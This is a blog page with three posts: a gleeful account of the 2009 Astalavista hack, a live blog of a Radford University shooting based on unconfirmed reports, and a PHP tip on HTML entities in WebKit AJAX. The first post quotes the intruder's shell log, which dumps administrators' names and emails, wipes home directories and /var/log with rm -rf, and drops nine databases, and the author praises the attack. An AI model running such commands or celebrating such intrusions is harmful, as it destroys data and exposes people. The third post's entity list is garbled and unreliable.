Geekery, Images

The infamous sources for exploits, hacks, etc. Astalavista.net, and Astalavista.com have been hacked. The hacker kept a log of the entire shell session and posted it for everyone’s viewing pleasure.

Astalavista claimed to be run by security experts. From http://astalavista.com/faq:

>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

It was very clear that this was untrue.

So why were they hacked? I’ll let the hacker tell you:

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the "community" but for the money, they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and they charge you $6.66 per months to access a dead forum with a directory filled with public releases and outdated / broken services.

We wanted to see how good that "team of security and IT professionals" really is.

To sum up what you’re about to see…

Astalavista:

[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

Apparently, gaining access to the self-proclaimed security expert’s site was as simple as:

anti-sec:~# ./g0tshell astalavista.com -p 80
	[+] Connecting to astalavista.com:80
	[+] Grabbing banner...
		LiteSpeed
	[+] Injecting shellcode...
	[-] Wait for it	
	[~] We g0tshell	
sh-3.2$

The person doing the work was kind enough to post a log of everything that he did with the shell at Pastebin.

The results are absolutely hilarious. Storing passwords in plaintext with MySQL databases. That’s secure, right?

SELECT USER,nickname,password,email FROM users WHERE userlevel = 1;

| user | nickname | password | email
| pascal | prozac | ******** | info@astalavista.net |
| Ivan Schmid | rOOtless1 | ******** | ivan.schmid@comvation.com|
| qreymer | Palermo | ******** | eche@home.se |
| Christian Wehrli | g0atherd | ******** | g0atherd@gmx.net |
... etc.

Passwords removed to protect the possibly innocent.

Checking the .bash_history for some users reveals mysql connect strings with passwords in the strings themselves instead of letting it prompt for a password. All in all, if you’re familiar with Linux and security in any fashion, you can get a good chuckle out of how terribly managed this site for security experts is.

The log is quite entertaining. Our hacker was kind enough to show us some messages that were being passed around from the administrators of the site to talk about how they can make more money. Here’s a particularly hilarious one:

select iss_summary,iss_description from eventum_issue where iss_id = 16;


| iss_summary | iss_description |
| Website guidance | Virtual Girl which guides you trought the website.
We need a girl with who you can ( talk )!!!
Also for the News!
So my suggestion is a girl who read you the news loud if you like!
you can choose between read yourselfe or she read it for you or both!
Go to www.heise.de! There is an example for Voice News! It's a good thing!!!
Have a look on the example girls!!
http://www.yaoti.com/de/free_yaoti.html
or that
http://www.yellostrom.de/

After gaining root access, the hacker leaves us with an ending that is not unlike the fantastic explosion of the Death Star:

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
drwx--x--x 10 com     com      4096 Apr 28 12:40 com
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
drwx------  3 jon     jon      4096 Sep 21  2007 jon
drwx------  2 root    root    16384 Sep 11  2007 lost+found
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
drwx------  2 jon     jon      4096 Sep 15  2007 test
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
| ideapool              |
| mysql                 |
| test                  |
| yourmaster            |
+-----------------------+
14 rows in set (0.03 sec)
mysql> drop database astanet_membersystem;
droQuery OK, 46 rows affected (0.81 sec)
mysql> drop database com_contrexx;
Query OK, 211 rows affected (2.72 sec)
mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)
mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)
mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)
mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)
mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)
mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)
mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| da_roundcube       |
| dolphin            |
| mysql              |
| test               |
+--------------------+
5 rows in set (0.00 sec)

Let’s hope the “Security Experts” have off-site backups. In the meantime, you can check out the original here or download it in .txt format here.

The hacker left the ending with a wonderful quote suited for Astalavista.com/net:

What a journey! We’re not sure exactly why the "Terminator" had any influence on their naming (conventions) but we’re sure Arnold himself wouldn’t be in the wrong to say this pack of morons *wont be back*.

Well done anti-sec, well done.

If you liked this post, then please consider subscribing to my feed.

Uncategorized

There has been a shooting reported shooting at Radford University. At the building known as “the Bonnie.” The suspect was seen at the Bonnie. The initial shooting is reported to have occurred on Calhoun and Madison.

Students received calls and text messages letting them know that they should seek shelter and that the city was looking for a black male with a do-rag, no shirt, and a camo jacket. I spoke to a University student who is currently seeking shelter in her dorm room at the University. On her way back from the 7-11, there was apparently a long line of cop cars which seemed odd to her, for a Thursday evening. Police have not confirmed what they were investigating but it is almost certain, at this time, that it was a shooting.

She confirmed that a friend of hers was nearby when it occurred and that he was very shaken up by it.

“I can’t believe our school doesn’t send an email out.”

“Think of how many parents are freaking out right now.”

Students and parents are turning to their University web site and finding no information. At this time, both the alert section on the University website and the alert section in the University police website have no alerts of any kind listed.

The shooter is, apparently still loose as students have not received any indication from the University that it is safe to leave their shelter.

“There are still people walking around campus that have no idea. Some people didn’t even get notified.”

More as the story develops.

10:29pm EST: sources say that there was one victim shot nine times and that the suspect was last seen in or near the Bonnie. This has not yet been confirmed by any officials.

10:54pm EST: sources say two more people have been shot, though this has not been officially confirmed. The University still has no information posted to their alerts on their website. News sources say tactical teams were deployed in a couple of University buildings. Students reporting that a building check will be occurring. The initial shooting is reported to have occurred on Calhoun and Madison. Confusion and distress evident as students turn to their University website and find no information.

11:04pm EST: text message received by students form the University:

“Command center established. no further sightings of supspect[sic]. stay in rooms and lock doors. Further updates to follow.” Still no updates on the University website.

11:16pm EST: University finally updates their website with alert:

Radford University Police are asking that all RU students stay indoors and lock their doors. The RU community is urged to refer back to this page, radford.edu, for instructions and updates. Radford University police are patrolling the campus seeking a suspect involved in a shooting earlier this evening. Two connected alerts have been issued and the campus is now considered “locked down.”

All media are encouraged to report to Lot ZZ, adjacent to the Dedmon Center where further information will be made available.

11:24pm EST: no further reports on any additional shootings beyond the first. Currently, one victim was confirmed to be shot in the chest. The victim was taken to the hospital and reports indicate that they did not survive the shooting, though no official word, yet.

12:13am EST: CNN has confirmed the death of the victim in the shooting.

Another TXT update from University@11:34pm EST:

“No further sigtings[sic] of the suspect at this time. Building searches are ongoing. Stay in your room and lock doors.”

Website updated:

RADFORD — The following message was distributed by the ConnectEd system to campus subscribers at 11:34 p.m.: “Attention. RUPD and the Radford City Police have established checkpoints and a command center. No further sightings of the suspect at this time. Buildng searches are ongoing. Stay in your room and keep all doors locked. Updates to come.”

11:30 p.m. — Attention — RUPD and Radford City Police have established checkpoints and a command center. SWAT teams will be entering academic buildings to continue the search for a suspect involved in an off-campus shooting incident who may now reportedly be on the RU campus. All Radford University students are asked to shelter in place by staying in their rooms and keeping their doors locked.

All media are encouraged to report to the Joint Information Center in the Dedmon Center, which can be accessed from the Administrative entrance off of University Drive.

1:30am EST: another update from the University that there are still no sightings of the shooter.

2:53am EST: another txt message update from the University@2:10am EST:

“Police are still checking and clearing buildings. Stay indoors with the door locked. updates to continue”

The school’s website was also updated earlier:

RADFORD — Attention. RU PD and Radford City Police are continuing their search and clearing operations of academic buildings. There are no further sightings of the suspect to report. Further updates will be issued on the RU cable television system. Students are reminded to stay in their rooms and keep doors locked.

Please be advised that there are students on campus who are sheltering in place in secure academic buildings at this time.

Geekery

If you’re having issues with getting some AJAX to work in Chrome or the newer Safari versions, then I hope this post will hope you.

This issue arose when one of our designers was testing some of the new AJAX I had written in Chrome. It worked fine in Firefox and IE, but Chrome was choking on the XML that was coming back. Treating it as though it were equal to null and alerting the appropriate response that is written in to our AJAX JavaScript. A bit more testing revealed that Safari was also having the issue. Once we figured that out, it became evident that searching for issues with WebKit would help.

Both browsers use the WebKit application framework. Because of this, they both enforce (choke) on XHTML that is given to them which does not follow the standards of XHTML. One of these standards, is that virtually all HTML entities are not valid. Here are the three that are:

 
<
&rt;

All other html entities need to be converted to their XML-safe (ASCII) form. So:

˜ = ñ

This can mess up AJAX that works in Internet Explorer and Firefox because they don’t mind dealing with XHTML coming back from an AJAX response with HTML entities. If you’re passing complicated strings with any entities in it through your AJAX requests, don’t expect them to work with any of the browsers using the current WebKit framework.

It took me a while to figure out what was causing the issue that our testers were experiencing, but once we did some searching, we found that others have talked about having this, or a similar problem, too.

We had experienced an issue with foreign characters creating improper RSS feeds for the same reason: html entities showing up when they shouldn’t be. I researched and wrote a function then that would convert all the HTML entities to their numeric format that would be safe. I applied this function to the AJAX responses coming back and presto, it worked.

So, I thought I would share this function with everyone in case someone else was having a similar problem:

function clean_string_for_valid_xml($string) {
    $entities_array = array();
    foreach (get_html_translation_table(HTML_ENTITIES, ENT_QUOTES) as $character => $entity) {
        $entities_array[$entity] = '&#' . ord($character) . ';';
    }
    return str_replace(array_keys($entities_array), $entities_array, $string);
}

Basically, we’re using the get_html_translation_table function to grab all of the entities. Then, we’re using the ord function to get the ASCII value for those entities. Then, we’re returning our string with the entities properly replaced.

Hopefully this works for you, or at least leads you to an answer that works for you.

If you liked this post, then please consider subscribing to my feed.